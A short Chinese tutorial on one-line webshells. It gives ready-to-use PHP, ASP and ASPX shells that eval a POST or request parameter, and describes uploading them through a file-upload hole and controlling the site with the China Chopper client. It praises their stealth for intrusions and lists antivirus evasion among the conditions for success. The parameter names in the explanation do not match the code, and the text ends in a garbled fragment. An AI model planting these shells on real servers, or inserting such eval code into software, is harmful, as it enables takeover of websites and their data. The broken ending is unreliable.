一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
常见的一句话木马:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request (“pass”)%>
aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后可以在本地通过中国菜刀chopper.exe获取和控制整个网站目录。
入侵条件
(1)木马上传成功,未被杀(木马免杀);
(2)知道木马在网站存储的路径在哪;
(3)上传的木马能正常运行。
代码分析:
@的含义表示后面即使执行错误,也不报错。
eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘attack’]表示从页面中获得attack这个参数值(变量)。
php里面几个超全局变量: G E T 、 _GET、